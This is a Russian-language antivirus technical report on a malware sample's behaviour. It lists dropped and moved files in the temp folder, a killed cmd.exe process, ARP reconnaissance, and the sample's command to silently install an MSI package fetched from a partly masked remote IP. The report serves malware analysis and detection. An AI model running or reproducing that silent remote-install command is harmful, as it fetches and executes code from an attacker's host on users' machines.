Техническая информация
Вредоносные функции
Создает и запускает на исполнение
- '<SYSTEM32>\msiexec.exe' /i http://45.##1.247.128/api.msi /qn
Завершает или пытается завершить
следующие системные процессы:
- <SYSTEM32>\cmd.exe
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\mw-142ffd14-2f53-4644-8428-aca9a7d6c9e0\msiwrapper.ini
- %TEMP%\mw-142ffd14-2f53-4644-8428-aca9a7d6c9e0\files.cab
- %TEMP%\mw-142ffd14-2f53-4644-8428-aca9a7d6c9e0\files\$dpx$.tmp\c100730b115e0c4d85d76e0d741ea6ad.tmp
- %TEMP%\891c.tmp\891d.tmp\891e.bat
Удаляет следующие файлы
- %TEMP%\891c.tmp\891d.tmp\891e.bat
Перемещает следующие файлы
- %TEMP%\mw-142ffd14-2f53-4644-8428-aca9a7d6c9e0\files\$dpx$.tmp\c100730b115e0c4d85d76e0d741ea6ad.tmp в %TEMP%\mw-142ffd14-2f53-4644-8428-aca9a7d6c9e0\files\renameme.exe
Сетевая активность
TCP
Запросы HTTP GET
- http://45.##1.247.128/api.msi
Другое
Создает и запускает на исполнение
- '%TEMP%\mw-142ffd14-2f53-4644-8428-aca9a7d6c9e0\files\renameme.exe'
- '%WINDIR%\syswow64\expand.exe' -R files.cab -F:* files' (со скрытым окном)
Запускает на исполнение
- '%WINDIR%\syswow64\expand.exe' -R files.cab -F:* files
- '<SYSTEM32>\cmd.exe' /c "%TEMP%\891C.tmp\891D.tmp\891E.bat %TEMP%\MW-142ffd14-2f53-4644-8428-aca9a7d6c9e0\files\RenameMe.exe"
- '<SYSTEM32>\cmd.exe' /c arp -a |findstr /i "Interface"
- '%WINDIR%\syswow64\arp.exe' -a
- '%WINDIR%\syswow64\findstr.exe' /i "Interface"
